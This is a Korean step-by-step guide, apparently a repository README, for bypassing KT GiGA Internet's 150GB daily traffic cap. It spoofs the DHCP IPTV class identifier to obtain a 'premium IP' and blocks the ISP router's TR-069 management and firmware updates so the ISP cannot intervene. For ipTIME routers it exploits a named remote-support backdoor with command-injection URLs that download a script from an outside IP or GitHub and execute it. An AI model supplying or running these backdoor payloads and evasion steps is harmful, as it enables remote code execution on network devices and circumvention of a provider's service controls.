인터넷 속도제한 qos 풀기 해제 기가인터넷 KT GiGA 인터넷의 일일 150GB QoS제한 우회 팁
Glacier/backblaze 백업, 스팀/Steam/에픽스토어/Epic Store 게임 다운로드와 같이 짧은 시간 내에 대용량의 인터넷 트래픽 송수신이 필요한 시나리오에서 KT 기가 인터넷의 일일 150GB QoS 트래픽 제한(베이직, 에센스 요금제 기준)을 우회하기 위해, 프리미엄 IP(주로 KT의 IPTV 서비스를 제공하기 위해 사용됨, 일일 트래픽 제한 없음)를 취득하는 방법에 대해 톺아보기
Important
잠깐! 그 전에, 이 글은 당신에게 문해력과 NCS 문제해결능력을 요구합니다
글을 읽고 이해하는 능력을 기르기 위한 특설 웹사이트와, 문제 상황에 대처하는 능력을 기르기 위한 특설 웹사이트를 방문하여 설명을 읽고 올바르게 이해하며, 실제 적용 시 발생할 수 있는 문제에 대한 최소한의 대처능력을 가지고 있는지 스스로 검증해봅시다.
Tip
아래의 기기별 설정방법은 KT의 인터넷 회선 또는 KT GiGA WiFi로부터 IP를 할당받은 기기만 적용할 수 있으므로 여러 대의 Router를 임의로 설치한 환경 또는 이중 NAT 구성에서 어떤 기기가 주 Router인지 명확하게 인지하고 있지 않다면, 거주중인 지역에 홈 네트워크 컨설팅이 가능한 출장 서비스1를 신청하세요
KT GiGA WiFi/iptime/ASUSWRT/OpenWrt/넷기어/시놀로지RT/Ubiquiti UniFi/기업용 브랜드 지원
TP-LINK Omada, OPNsense, MikroTik에 대한 설정방법은 ROKFOSS에서 제공됩니다.
그 외 기기는 지원 기기의 LAN포트와 미지원 기기의 WAN 포트를 연결하고, 지원 기기별 설정을 완료하세요.
예시 - KT GiGA WiFi/ASUSWRT의 컴퓨터/LAN 포트와 미지원 Router의 WAN/인터넷 포트를 연결한 경우. 단, AP/허브/브릿지 모드 등으로 변경한 경우 Router로서 기능하지 않으므로 제외
또한 적용 후 프리미엄 IP 대역은 원래 일반적인 컴퓨터/스마트 기기로부터의 트래픽이 거의 없었던 특성 상 몇몇 사이트에서 VPN 환경과 같이 Captcha 등을 요구하거나, 지연되거나, 액세스를 거부당할 가능성이 약간 높아집니다.
제한에서 벗어날 각 기기(이중 NAT 구성의 미지원 Router 포함)에 대해 수동IP설정 또는 GiGA WiFi의 사용자 설정 웹 페이지에서 '수동 IP 할당 설정'(DHCP 정적 할당) 설정을 마치세요
아래 표를 확인하여 현재 사용중인 모델의 KT GiGA WiFi에서 사용 가능여부(추측 포함)를 확인하기:
| \ | 수동IP설정 | 수동 IP 할당 설정 | 업그레이드,TR069 차단 |
|---|---|---|---|
| KM06-506H, KM06-704H | ? | ✕ | ? |
| DW02-412H | 〇 | ✕ | ✕ |
| KM08-708H, DV01-901H Wave2 |
? | ? | ? |
| TI04-708H Wave2 | 〇 | ✕ | ✕ |
| KM12-007H GiGA WiFi home ax |
? | ? | ? |
| KM17-305H GiGA WiFi home ax |
〇 | 〇 | ? |
| KM15-103H GiGA WiFi home ax |
〇 | 〇 | 〇 |
| DV02-012H GiGA WiFi home ax |
〇 | 〇 | ✕ |
| HR08-407H GiGA WiFi home ax |
〇 | ✕ | 〇 |
| AR06-012H GiGA WiFi home ax |
〇 | ✕ | ✕ |
| KM18-311H KT WiFi 6D |
〇 | 〇 | ? |
| KB01-411H KT WiFi 7D |
〇 | 〇 | 〇 |
표에서 확인할 수 없는 모델의 각 기능 사용 가능여부를 여러분의 제보(Issues, 메일주소 3570kgen@naver.com , 기여자에 대한 기록을 남기고 싶을경우 Pull Request 등)를 통해 보충할 수 있게 해주세요!
사용중인 기기의 모델명, 펌웨어 버전, 수동IP설정, '수동 IP 할당 설정'의 성공 여부, KT GiGA WiFi 사용자 설정 페이지 - 상태정보의 로그('Update' 또는 'Upgrade' 등의 문자열을 포함하는 로그 확인, 부팅 후 많은 시간이 지나면 다른 로그에 의해 확인할 수 없는 경우가 있음)를 확인한 후, 'Update' 또는 'Upgrade' 등의 문자열을 포함하는 로그가 아래의 4가지 규칙 추가 & 재부팅 후 2-5분 후에 기록되는 로그와 비교해 차이점이 있는지 확인하고 알려주셨으면 합니다.
수동IP설정을 위해서는 하나의 GiGA WiFi(와 연결된 메시 단말기를 통해, 또는 AP/허브/브릿지 모드로 구성된 미지원 Router를 통해 연결하는 경우 또한 GiGA WiFi에 연결하는 것으로 취급)에 대해 연결할 각 기기(컴퓨터, 스마트폰, 미지원 Router)마다 다른 IP주소를 설정하세요, 172.30.1.149부터 172.30.1.252까지가 권장되는 사용 가능한 범위입니다
각 기기별 '수동 IP 설정방법'을 당신이 스스로 찾을 수 없다면, 거주중인 지역에 홈 네트워크 컨설팅이 가능한 출장 서비스1를 신청하세요
Windows 10과 같이 서브넷 마스크가 아닌 서브넷 접두사 길이를 요구하는 경우 24를 입력, Windows 11과 같이 서브넷 접두사 길이가 아닌 서브넷 마스크를 요구하는 경우 255.255.255.0을 입력, 기본 게이트웨이 주소를 요구하는 경우 172.30.1.254를 입력, DNS 서버 주소를 요구하는 경우 168.126.63.1과 168.126.63.2 또는 임의의 DNS 서버 주소를 입력
각 기기는 수동IP설정 적용 후, 다른 WiFi 연결 또는 다른 Router와 연결 시 네트워크/인터넷에 연결할 수 없는 경우가 있으며 이 때 해당 설정을 원래대로(자동/DHCP) 되돌리기
변경 사항이 적용된 후, https://icanhazip.com 와 같은 외부 서비스를 사용하여 외부 IP주소를 확인하면 기존과 다른 '프리미엄 IP'가 할당된 것을 확인할 수 있으며, 프리미엄 IP에서도 포트 포워딩을 사용할 수 있습니다.
마무리로서, 해당 방법의 사용을 저지하려는 시도 중 일부를 방지하기 위해 GiGA WiFi의 자동 펌웨어 업그레이드와 TR-069 통신을 차단 (일부 기기만 지원) 할 수 있는데요, 장치설정 - 보안 기능 - 패킷 필터 설정에서
- 소스 포트가 9443, 목적지 IP 주소가 172.30.1.1 - 172.30.1.252, 프로토콜이 TCP, 허용/차단이 허용인 규칙을 추가
- 소스 포트가 8443, 목적지 IP 주소가 172.30.1.1 - 172.30.1.252, 프로토콜이 TCP, 허용/차단이 허용인 규칙을 추가
- 소스 포트가 9443, 프로토콜이 TCP, 허용/차단이 차단인 규칙을 추가
- 소스 포트가 8443, 프로토콜이 TCP, 허용/차단이 차단인 규칙을 추가
KT WiFi 7D(KB01-411H)에서는 모든 칸을 채워야 하므로 4개 규칙의 소스IP주소와 차단 규칙의 목적지IP주소를 0.0.0.0 - 255.255.255.255로 입력, 4개 규칙의 목적지포트를 1 - 65535로 입력.
4개의 규칙을 모두 추가한 후, 허용 규칙이 차단 규칙보다 밑에(머큐리) 또는 위에(H1Radio, KB01-411H) 있으면 됩니다. 이 때 먼저 허용 규칙부터 추가해야 GiGA WiFi에 연결된 IPTV 등의 기기에서의 오작동을 미연에 방지할 수 있습니다:
2025년 시점에 있어서 이미 수명이 다한 대부분의 WiFi5 모델, 특히 AC58U/AC68U/AC56/AC1900 계열 모델은 지원하지 않을 가능성이 높음
http://www.asusrouter.com 에서 초기 설정 시 입력한 관리자 계정과 암호를 입력 후
- 아래 링크의 자동 IP - c단락을 참고하거나,
- 아래 스크린샷을 참고하여
클래스 식별자 (Option 60)를 KT_PR_HH_A_A 로 입력 후 적용:
https://www.asus.com/kr/support/faq/1011715/
KT GiGA WiFi와 연결된 기기에서 http://172.30.1.254:8899 , 구성되지 않은 경우 ID는 ktuser , 비번은 megaap 또는 homehub 로 로그인 후 새로운 사용자 이름과 비번을 설정하여 사용자 설정 페이지에 접근할 수 있습니다:
장치설정 - 네트워크 관리 - LAN 연결 설정
머큐리 - 148을 지우고 252를 입력한 다음, 적용 버튼을 누르지 않고 각 기기의 MAC 주소와 172.30.1.149부터 172.30.1.252까지의 범위 중 다른 기기와 중복되지 않는 IP 주소를 입력하여 설정을 추가
다보링크 - 148을 지우고 252를 입력한 다음, 적용 버튼을 누르고 각 기기의 MAC 주소와 172.30.1.149부터 172.30.1.252까지의 범위 중 다른 기기와 중복되지 않는 IP 주소를 입력하여 설정을 추가
WiFi 6D/6E/7D 이후 기기는 네트워크 - 네트워크 설정 - LAN 연결 설정
KB01-411H - 각 기기의 MAC 주소와 172.30.1.149부터 172.30.1.252까지의 범위 중 다른 기기와 중복되지 않는 IP 주소를 입력하여 설정을 추가
변경 사항은 다음에 유선 또는 무선으로 연결될 때 적용되므로 KT GiGA WiFi를 재시동하거나 각 기기의 네트워크 연결을 끊었다가 다시 연결해야 할 수 있습니다.
백도어 출처 - https://github.com/tylzars/iptime-debug - 펌웨어 버전 15.25.8, ipTIME A2004S에서 동작 확인됨
Note
BE3600M/BE5100M 등 AN7563PT 탑재 기기를 지원하지 않는 문제가 확인되어 미러 링크에서 먼저 해당 문제를 수정하였으며, 곧 원본 링크에도 제공될 예정입니다.
위 출처와 같이 iptime 공유기의 '원격 지원'기능에 잠재된 백도어에 접근할 방법이 있는 경우에만 유효합니다
- 적용하려는 기기는 관리자 계정/비밀번호가 설정되어 있어야 하며, 다음으로 '악성 스크립트 접근 방지(CSRF)'기능이 꺼져 있으며, 마지막으로 '원격 지원'기능을 켜 주세요:
- 아래 주소 중 상황에 맞는 적절한 하나의 '⧉'를 선택하여 복사 후 로그인한 관리자 페이지의 주소 칸에 붙여넣어 마칩니다.
먼저 첫번째 주소는, 아래 스크린샷과 같이 'wget: not an http or ftp url' 메시지가 출력되며 원본 링크의 암호화된 연결을 지원하지 않는 환경에서 사용할 수 있는 미러 링크로서, 접속자의 IP 주소와 타임스탬프를 포함한 접속 기록을 저장함에 동의하고 사용하세요:
http://192.168.0.1/sess-bin/d.cgi?act=1&fname=&aaksjdkfj=!@dnjsrurelqjrm*%26&dapply=%20Show%20&cmd=wget%20-O%20%2ftmp%2fstart.sh%20http%3a%2f%2f168.138.196.144%2fiptime_bootstrap.sh%20%3bchmod%20755%20%2ftmp%2fstart.sh%20%3b%2ftmp%2fstart.sh
Note
Network Unreachable 오류가 출력되는 경우 원본 또는 미러 서버로부터 필요한 파일을 다운로드하지 못한 것이며, 미러 서버가 드물게 접속자의 IP 대역을 허용하지 않았을 수 있으므로 KT 인터넷을 사용중인 것이 맞다면 제보해주시기 바랍니다.
또는 둘 중 사용자의 환경에서 사용 가능한 원본 링크 사용:
http://192.168.0.1/sess-bin/d.cgi?act=1&fname=&aaksjdkfj=!@dnjsrurelqjrm*%26&dapply=%20Show%20&cmd=curl%20-Lo%20%2ftmp%2fstart.sh%20https%3a%2f%2fraw.githubusercontent.com%2fveilRedeemer%2fbypassQoSKoreatelecomISP%2frefs%2fheads%2fmain%2fiptime_bootstrap.sh%20%3bchmod%20755%20%2ftmp%2fstart.sh%20%3b%2ftmp%2fstart.sh
http://192.168.0.1/sess-bin/d.cgi?act=1&fname=&aaksjdkfj=!@dnjsrurelqjrm*%26&dapply=%20Show%20&cmd=wget%20-O%20%2ftmp%2fstart.sh%20https%3a%2f%2fraw.githubusercontent.com%2fveilRedeemer%2fbypassQoSKoreatelecomISP%2frefs%2fheads%2fmain%2fiptime_bootstrap.sh%20%3bchmod%20755%20%2ftmp%2fstart.sh%20%3b%2ftmp%2fstart.sh
- 아래와 같이 표시되면 성공. 다운로드한 데이터와 취득한 프리미엄 IP를 포함하여 2번 이후의 변경 사항은 특정 공유기 설정을 변경하거나 재부팅되거나 전원이 끊어지면 지워집니다:
Tip
이미 링크를 적용한 상태에서 성공 여부와 상관없이 다시 시도하면 중복 적용으로 인한 문제 발생을 미연에 방지하기 위해 공유기가 재부팅됩니다.
VPN 클라이언트(WireGuard 제외)를 구성한 경우 '여러 개의 WAN 인터페이스로 인해 실패'메시지가 표시되면 해당 오류를 발생시키는 프로파일을 제거한 후 다시 시도해봅시다
대시보드에서 톱니바퀴 아이콘 - Internet - KT GiGA 인터넷 연결을 제공하는 WAN 포트 - DHCP Client Options에 Option은 60, 값은 'KT_PR_HH_A_A'로 설정 후 추가 & 적용합니다.